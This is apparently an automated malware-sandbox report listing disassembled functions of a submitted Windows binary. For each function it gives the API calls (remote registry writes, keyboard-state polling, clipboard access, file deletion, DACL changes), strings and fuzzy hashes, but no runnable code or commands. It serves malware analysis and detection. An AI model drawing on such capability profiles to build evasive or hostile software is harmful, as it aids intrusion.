Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 8364f614342c03dbb17d60185172e2fbb4e9ca9109c7588e79cdf9dcdda488ca
Instruction ID: 94f8b5b0bbe42ce76b6877c92e28c8b87fa0656b1751f7fcf9ad92d1b91c0570
Opcode Fuzzy Hash: 8364f614342c03dbb17d60185172e2fbb4e9ca9109c7588e79cdf9dcdda488ca
Instruction Fuzzy Hash: 8031C97A9006196FDB12EBB4DC88EEEB3AC9F09361F550576E904D30A0DB34DA45CA50

Function 00350AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0035F910,00000000,?,00000000,?,?), ref: 00350C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00350C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00350D1D
RegCloseKey.ADVAPI32(?), ref: 0035103D
RegCloseKey.ADVAPI32(00000000), ref: 0035104A

Strings

REG_BINARY, xrefs: 00350FD8
REG_SZ, xrefs: 00350D5B
REG_MULTI_SZ, xrefs: 00350E05
REG_EXPAND_SZ, xrefs: 00350CBA
REG_DWORD, xrefs: 00350F0E
REG_QWORD, xrefs: 00350F8B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 3c69116fd596693fc9daf773eb929ce1c3931659db84c642d3caeeb54722128c
Instruction ID: 901d3eeb725f6f7be7889b9cfafd7c8c69d632fa247b4753217ab36cc9d293b6
Opcode Fuzzy Hash: 3c69116fd596693fc9daf773eb929ce1c3931659db84c642d3caeeb54722128c
Instruction Fuzzy Hash: A10247752106519FCB15EF24C895E2AB7E5FF88720F05885DF88A9B3A2CB31EC55CB81

Function 0035C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

DragQueryPoint.SHELL32(?,?), ref: 0035C917

Part of subcall function 0035ADF1: ClientToScreen.USER32(?,?), ref: 0035AE1A
Part of subcall function 0035ADF1: GetWindowRect.USER32(?,?), ref: 0035AE90
Part of subcall function 0035ADF1: PtInRect.USER32(?,?,0035C304), ref: 0035AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0035C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0035C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0035C9AE
_wcscat.LIBCMT ref: 0035C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0035C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0035CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0035CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0035CA47
DragFinish.SHELL32(?), ref: 0035CA4E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0035CB41

Strings

@GUI_DRAGID, xrefs: 0035CAB9
@GUI_DROPID, xrefs: 0035CA6E
pr9, xrefs: 0035CA8B
@GUI_DRAGFILE, xrefs: 0035CAF0

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr9
API String ID: 2166380349-2364328000
Opcode ID: 68db940d1de6d49b34a49b87a3b7d616cbe58358fd3f807e66185f0d06c5b214
Instruction ID: 88c8a902fdaebd34f1a68e2478b654da005a2dc9a762fdc6b15a7f3d12014d97
Opcode Fuzzy Hash: 68db940d1de6d49b34a49b87a3b7d616cbe58358fd3f807e66185f0d06c5b214
Instruction Fuzzy Hash: F7613871118301AFC712EF64CC85D9BBBE8EF89755F000A2EF591962B1DB709A49CB52

Function 0033F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0033F37E
_wcscmp.LIBCMT ref: 0033F393
_wcscmp.LIBCMT ref: 0033F3AA

Part of subcall function 003345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003345DC

FindNextFileW.KERNEL32(00000000,?), ref: 0033F3D9
FindClose.KERNEL32(00000000), ref: 0033F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0033F400
_wcscmp.LIBCMT ref: 0033F427
_wcscmp.LIBCMT ref: 0033F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0033F450
SetCurrentDirectoryW.KERNEL32(0038A5A0), ref: 0033F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0033F478
FindClose.KERNEL32(00000000), ref: 0033F485
FindClose.KERNEL32(00000000), ref: 0033F497

Strings

*.*, xrefs: 0033F3FB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 8e469b3d82714e5e48584e7ff30ae9ff80ae95335389f4302cf39c25f2cb6188
Instruction ID: 3d9fc31576695c36dfaef169f95f9fa318afca37e6af87ba7f3bd2cec961e68f
Opcode Fuzzy Hash: 8e469b3d82714e5e48584e7ff30ae9ff80ae95335389f4302cf39c25f2cb6188
Instruction Fuzzy Hash: 1331D5769012196FDB12AB65ECC8EEFB7AC9F09365F510175F950A30B0D730DA44CA50

Function 0035C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0035C4EC
GetFocus.USER32 ref: 0035C4FC
GetDlgCtrlID.USER32(00000000), ref: 0035C507
_memset.LIBCMT ref: 0035C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0035C65D
GetMenuItemCount.USER32(?), ref: 0035C67D
GetMenuItemID.USER32(?,00000000), ref: 0035C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0035C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0035C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0035C744
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0035C779

Strings

0, xrefs: 0035C62A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 804d442e7ebbfaddce83d5b3e7cbe36418bbd5bb0e105759bd6a9d421023a71a
Instruction ID: f4d84086e9b166732a76ab1fb8c70171ab9e9d2268e35b1c2c3d4309514d4adb
Opcode Fuzzy Hash: 804d442e7ebbfaddce83d5b3e7cbe36418bbd5bb0e105759bd6a9d421023a71a
Instruction Fuzzy Hash: 2D817A702183059FD712CF24C884E6BBBE8EB8935AF01192EFD95972A1D730D909CB92

Function 003281F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0032874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328766
Part of subcall function 0032874A: GetLastError.KERNEL32(?,0032822A,?,?,?), ref: 00328770
Part of subcall function 0032874A: GetProcessHeap.KERNEL32(00000008,?,?,0032822A,?,?,?), ref: 0032877F
Part of subcall function 0032874A: RtlAllocateHeap.NTDLL(00000000,?,0032822A), ref: 00328786
Part of subcall function 0032874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0032879D

Part of subcall function 003287E7: GetProcessHeap.KERNEL32(00000008,00328240,00000000,00000000,?,00328240,?), ref: 003287F3
Part of subcall function 003287E7: RtlAllocateHeap.NTDLL(00000000,?,00328240), ref: 003287FA
Part of subcall function 003287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00328240,?), ref: 0032880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0032825B
_memset.LIBCMT ref: 00328270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0032828F
GetLengthSid.ADVAPI32(?), ref: 003282A0
GetAce.ADVAPI32(?,00000000,?), ref: 003282DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003282F9
GetLengthSid.ADVAPI32(?), ref: 00328316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00328325
RtlAllocateHeap.NTDLL(00000000), ref: 0032832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0032834D
CopySid.ADVAPI32(00000000), ref: 00328354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00328385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003283AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 003283BF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 0188935187648baf2348f8fbd0c0425931ea863b0a17446427b8cf95f8cb47a2
Instruction ID: f0b3d0716f6bec67d2e335bc9502acadd36a56f13705a83c5974d77ce6f4b098
Opcode Fuzzy Hash: 0188935187648baf2348f8fbd0c0425931ea863b0a17446427b8cf95f8cb47a2
Instruction Fuzzy Hash: 75616F75A01219EFDF02DF94EC44AEEBB79FF04700F148129F915A7291DB319A05CB60

Function 002E6843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON

Download Yara Rule

Strings

CRLF), xrefs: 003216FA
UTF), xrefs: 00321533
NO_AUTO_POSSESS), xrefs: 00321567
UCP), xrefs: 00321546
LIMIT_MATCH=, xrefs: 003215A9
ANY), xrefs: 00321717
UTF16), xrefs: 00321508
LIMIT_RECURSION=, xrefs: 00321635
CR), xrefs: 003216C0
Oa., xrefs: 00321888, 0032192F, 003219DD
BSR_ANYCRLF), xrefs: 00321757
ANYCRLF), xrefs: 00321734
NO_START_OPT), xrefs: 00321588
LF), xrefs: 003216DD
BSR_UNICODE), xrefs: 00321771

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa.$UCP)$UTF)$UTF16)
API String ID: 0-3580056981
Opcode ID: dc54425bb5ab298e00b5a1b37480b608c3fc7cf6f1efe0db91f8dd3066426ab4
Instruction ID: aa6b481e6d6ef25a5a056a66d6257139824a44f07812587f7064b19d2decfda3
Opcode Fuzzy Hash: dc54425bb5ab298e00b5a1b37480b608c3fc7cf6f1efe0db91f8dd3066426ab4
Instruction Fuzzy Hash: C072D371E10229CBDF25CF59D8847AEB7B5FF58310F6581AAE849EB280D7709D81CB90

Function 00350665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00350038,?,?), ref: 003510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350737

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003507D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0035086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00350AAD
RegCloseKey.ADVAPI32(00000000), ref: 00350ABA

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: e0878f63bd150bf49fa18aca43b749356657e2605bc6b4ebaf9c2883bba8cc62
Instruction ID: a5daad86683701975210f4a9a023a417eabc2930363975f28b303d7934598008
Opcode Fuzzy Hash: e0878f63bd150bf49fa18aca43b749356657e2605bc6b4ebaf9c2883bba8cc62
Instruction Fuzzy Hash: 2CE14C71204310AFCB15DF24C891E6ABBE8EF89714F04896DF84ADB2A2DB31ED15CB51

Function 00330219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00330241
GetAsyncKeyState.USER32(000000A0), ref: 003302C2
GetKeyState.USER32(000000A0), ref: 003302DD
GetAsyncKeyState.USER32(000000A1), ref: 003302F7
GetKeyState.USER32(000000A1), ref: 0033030C
GetAsyncKeyState.USER32(00000011), ref: 00330324
GetKeyState.USER32(00000011), ref: 00330336
GetAsyncKeyState.USER32(00000012), ref: 0033034E
GetKeyState.USER32(00000012), ref: 00330360
GetAsyncKeyState.USER32(0000005B), ref: 00330378
GetKeyState.USER32(0000005B), ref: 0033038A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a62697855f58c718ec964cfaeff33175be4d0bd1b156275fea857f7a0a938e7b
Instruction ID: f1a85e7be0fe84e387409da27ad4ae9d97ab0a37c0fcc0146cd0138eda63b2c9
Opcode Fuzzy Hash: a62697855f58c718ec964cfaeff33175be4d0bd1b156275fea857f7a0a938e7b
Instruction Fuzzy Hash: AD411A385047C96EFF3B8B64C8A83B6BEA06F12350F09449DD5C6971C2EBD499C4C7A2

Function 00344458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0034447F
EmptyClipboard.USER32 ref: 00344485
GlobalAlloc.KERNEL32(00000002,?), ref: 0034449A
CloseClipboard.USER32 ref: 00344539

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 1f43156a63f4e486a271c68b16ce219d4169e78b6a396833540b9ccf3e950525
Instruction ID: b9c016c7c775c0715f3592ad48ce35dddba182cde565f5377a669499fa5e01cc
Opcode Fuzzy Hash: 1f43156a63f4e486a271c68b16ce219d4169e78b6a396833540b9ccf3e950525
Instruction Fuzzy Hash: ED218E75201220AFDB12AF64EC09B6A77ACEF04716F11846AF946DB3B1DB74AD00CB54

Function 00333A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 002D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002D48A1,?,?,002D37C0,?), ref: 002D48CE

Part of subcall function 00334CD3: GetFileAttributesW.KERNEL32(?,00333947), ref: 00334CD4

FindFirstFileW.KERNEL32(?,?), ref: 00333ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00333B87
MoveFileW.KERNEL32(?,?), ref: 00333B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00333BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00333BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00333BF5

Strings

\*.*, xrefs: 00333A8A, 00333A93, 00333AA8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 8171a8e8a3b4f47d69a99cbcc1bb1ca8ac5f7478e1d184dc65b5577ecbf213c8
Instruction ID: 1b66574ad75c5e39eeca7c6dd8958cdbfe1d5ef4da5550af686c934143c28d18
Opcode Fuzzy Hash: 8171a8e8a3b4f47d69a99cbcc1bb1ca8ac5f7478e1d184dc65b5577ecbf213c8
Instruction Fuzzy Hash: A351733180525D9ADF16EBA0CDD29EDB7B8AF14300F64816AE44277291EF346F19CF60

Function 0035C27C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

Part of subcall function 002D2344: GetCursorPos.USER32(?), ref: 002D2357
Part of subcall function 002D2344: ScreenToClient.USER32(003967B0,?), ref: 002D2374
Part of subcall function 002D2344: GetAsyncKeyState.USER32(00000001), ref: 002D2399
Part of subcall function 002D2344: GetAsyncKeyState.USER32(00000002), ref: 002D23A7

ReleaseCapture.USER32 ref: 0035C2F0
SetWindowTextW.USER32(?,00000000), ref: 0035C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0035C3AD
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 0035C48F

Strings

@GUI_DROPID, xrefs: 0035C3E1
pr9, xrefs: 0035C438
pr9, xrefs: 0035C3FD
@GUI_DRAGFILE, xrefs: 0035C424

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$pr9$pr9
API String ID: 973565025-1031071232
Opcode ID: f2a6e540b35e1ed887e2a742e8b4d1abd34ba3e5c67acbbad0f3f078cab3f2f3
Instruction ID: e0f0e9b9bfe8d20a0419c98e280b689260ebe2e818401ac1f72eba7e694aa266
Opcode Fuzzy Hash: f2a6e540b35e1ed887e2a742e8b4d1abd34ba3e5c67acbbad0f3f078cab3f2f3
Instruction Fuzzy Hash: 5B519E74218305AFDB02EF24C856F6A7BE5EB88315F00452EF9918B2F1DB71A958CF51

Function 002E4140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00317B0C
VUUU, xrefs: 002E4520
Oa., xrefs: 002E4984, 00318173
VUUU, xrefs: 002E44ED
VUUU, xrefs: 002E44DB
ERCP, xrefs: 002E421F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
